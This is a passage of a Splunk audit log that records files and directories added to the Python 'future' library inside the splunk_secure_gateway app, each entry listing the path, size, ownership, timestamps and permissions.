size=264, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.591, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/html/parser.py", isdir=0, size=19770, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.587, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/html/entities.py", isdir=0, size=75428, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.583, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/html/__init__.py", isdir=0, size=924, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/text.py", isdir=0, size=1552, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/nonmultipart.py", isdir=0, size=832, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.469, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/multipart.py", isdir=0, size=1699, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.465, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/message.py", isdir=0, size=1429, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/image.py", isdir=0, size=1907, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.458, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/base.py", isdir=0, size=875, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/audio.py", isdir=0, size=2815, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/application.py", isdir=0, size=1401, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.442, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/utils.py", isdir=0, size=14270, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.439, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/quoprimime.py", isdir=0, size=10923, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/policy.py", isdir=0, size=8823, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/parser.py", isdir=0, size=5312, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/mime", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.423, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/message.py", isdir=0, size=35237, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/iterators.py", isdir=0, size=2348, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.416, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/headerregistry.py", isdir=0, size=20637, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.412, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/header.py", isdir=0, size=24448, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.408, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/generator.py", isdir=0, size=19520, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.404, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/feedparser.py", isdir=0, size=22736, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.400, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/errors.py", isdir=0, size=3680, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.394, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/encoders.py", isdir=0, size=2800, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.390, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/charset.py", isdir=0, size=17439, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.386, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/base64mime.py", isdir=0, size=3729, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.382, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/_policybase.py", isdir=0, size=14647, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.378, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/_parseaddr.py", isdir=0, size=17389, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.375, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/_header_value_parser.py", isdir=0, size=104692, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.370, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/_encoded_words.py", isdir=0, size=8443, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.367, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email/__init__.py", isdir=0, size=2269, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.161, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/xmlrpc", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.157, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/urllib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.152, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/total_ordering.py", isdir=0, size=1929, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:27.149, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.141, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/socketserver.py", isdir=0, size=24286, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.137, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/socket.py", isdir=0, size=15663, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.132, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/misc.py", isdir=0, size=32682, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.129, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/http", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.125, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/html", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.121, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/email", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:27.117, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/datetime.py", isdir=0, size=75552, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/_markupbase.py", isdir=0, size=16215, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.107, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/__init__.py", isdir=0, size=530, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.003, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/tests/base.py", isdir=0, size=19956, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.999, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/tests/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.894, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/newsuper.py", isdir=0, size=4146, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.890, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/newround.py", isdir=0, size=3181, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.887, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/newnext.py", isdir=0, size=2009, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.883, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/new_min_max.py", isdir=0, size=1757, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.880, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/misc.py", isdir=0, size=4550, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:26.876, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/iterators.py", isdir=0, size=1396, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.873, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/disabled.py", isdir=0, size=2109, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.870, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins/__init__.py", isdir=0, size=1687, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.865, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/utils/surrogateescape.py", isdir=0, size=6097, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.862, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/utils/__init__.py", isdir=0, size=21828, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.858, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/standard_library/__init__.py", isdir=0, size=27743, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.755, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/http/server.py", isdir=0, size=606, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.752, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/http/cookies.py", isdir=0, size=233, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.748, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/http/cookiejar.py", isdir=0, size=173, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/http/client.py", isdir=0, size=165, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.741, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/http/__init__.py", isdir=0, size=71, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.737, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/urllib/robotparser.py", isdir=0, size=179, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.734, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/urllib/response.py", isdir=0, size=342, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.729, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/urllib/request.py", isdir=0, size=3496, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.726, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/urllib/parse.py", isdir=0, size=1045, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.722, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/urllib/error.py", isdir=0, size=479, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.719, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/urllib/__init__.py", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.615, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/xmlrpc/server.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.611, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/xmlrpc/client.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:26.607, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/xmlrpc/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.604, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/test/support.py", isdir=0, size=259, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.600, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/test/__init__.py", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.596, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/dbm/ndbm.py", isdir=0, size=162, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.591, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/dbm/gnu.py", isdir=0, size=162, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.587, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/dbm/dumb.py", isdir=0, size=166, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.583, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/dbm/__init__.py", isdir=0, size=488, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.579, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/html/parser.py", isdir=0, size=167, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:26.575, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/html/entities.py", isdir=0, size=177, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.571, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/html/__init__.py", isdir=0, size=1016, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.466, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/ttk.py", isdir=0, size=302, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/tix.py", isdir=0, size=302, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:26.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/simpledialog.py", isdir=0, size=329, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.456, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/scrolledtext.py", isdir=0, size=329, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.452, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/messagebox.py", isdir=0, size=327, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.448, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/font.py", isdir=0, size=309, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.444, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/filedialog.py", isdir=0, size=323, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.441, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/dnd.py", isdir=0, size=306, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.437, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/dialog.py", isdir=0, size=311, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.433, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/constants.py", isdir=0, size=324, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.429, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/commondialog.py", isdir=0, size=333, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.425, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/colorchooser.py", isdir=0, size=333, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter/__init__.py", isdir=0, size=620, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.318, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/xmlrpc", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.313, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/winreg.py", isdir=0, size=163, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.309, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/urllib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.304, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/tkinter", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.301, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/sys.py", isdir=0, size=132, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.293, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/subprocess.py", isdir=0, size=251, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.289, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/socketserver.py", isdir=0, size=174, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.285, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/reprlib.py", isdir=0, size=161, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.279, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/queue.py", isdir=0, size=160, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.275, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/pickle.py", isdir=0, size=229, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.270, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/itertools.py", isdir=0, size=158, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.267, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/http", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.261, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/html", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.257, user=n/a, 